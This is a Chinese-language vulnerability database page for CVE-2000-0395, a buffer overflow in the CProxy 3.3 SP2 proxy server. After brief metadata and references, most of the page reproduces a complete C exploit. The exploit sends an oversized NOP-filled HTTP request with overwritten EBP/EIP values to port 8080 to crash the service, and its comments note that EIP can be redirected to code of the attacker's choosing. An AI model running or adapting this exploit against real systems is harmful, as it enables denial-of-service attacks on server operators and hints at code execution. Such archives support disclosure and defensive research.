CProxy 3.3 SP2 缓冲区溢出拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105833 漏洞类型 缓冲区溢出
发布时间 2000-05-16 更新时间 2005-05-02
CVE编号 CVE-2000-0395 CNNVD-ID CNNVD-200005-055
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19920
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-055
|漏洞详情
CProxy3.3存在缓冲区溢出漏洞,远程用户可以通过超长HTTP请求触发拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/1213/info

A buffer overflow DoS vulnerability exists in CProxy Server 3.3 Service Pack 2


/*
 * Remote Denial of Service for CProxy v3.3 - Service Pack 2
 * 
 * (C) |[TDP]|  - HaCk-13 TeaM -  2000      <tdp@psynet.net>
 *
 *
 * This program xploits an overflow vulnerability in CProxy 3.3 SP2
 * HTTP Service (8080), causing server shutdown
 *
 * Greetings to all the other members and all my friends :) 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BUFFERSIZE 247
#define NOP 0x90
// If you change this values you can change EIP and EBP values
// to redirect to a code that you want >;)
#define EIP 0x61616161
#define EBP 0x61616161

void usage(char *progname) {
 fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
 exit(1);
}

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE], remotedos[1024];
unsigned long *long_ptr,eip=EIP, ebp=EBP;
int aux,sock;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;

 fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");

 if (argc<2) usage(argv[0]);

 if (argc>=3) eip+=atol(argv[2]);

 if (argc>=4) ebp+=atol(argv[3]);

 ptr=buffer;
 memset(ptr,0,sizeof(buffer));
 memset(ptr,NOP,sizeof(buffer)-8);
 ptr+=sizeof(buffer)-8;
 long_ptr=(unsigned long*)ptr;
 *(long_ptr++) = ebp;
 *(long_ptr++) = eip;
 ptr=(char *)long_ptr;
 *ptr='\0';

 bzero(remotedos, sizeof(remotedos));
 snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);

 if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
 perror("socket()");
 return -1;
 }

 if ((he = gethostbyname(argv[1])) != NULL) {
 ip = *(unsigned long *)he->h_addr;
 } else {
 if ((ip = inet_addr(argv[1])) == NULL) {
  perror("inet_addr()");
  return -1;
 }
 }

 sin.sin_family = AF_INET;
 sin.sin_addr.s_addr = ip;
 sin.sin_port = htons(8080);

 fprintf(stderr,"\nEngaged...\n");
 if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
 perror("connect()");
 return -1;
 }

 if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) {
 perror("write()");
 return -1;
 }

 fprintf(stderr,"Bye Bye baby!...\n\n");
 if (close(sock) < 0) {
 perror("close()");
 return -1;
 }

 return(0);
}
|参考资料

来源:BUGTRAQ
名称:20000516CProxyv3.3SP2DoS
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=007d01bfbf48$e44f0e40$01dc11ac@peopletel.org
来源:BID
名称:1213
链接:http://www.securityfocus.com/bid/1213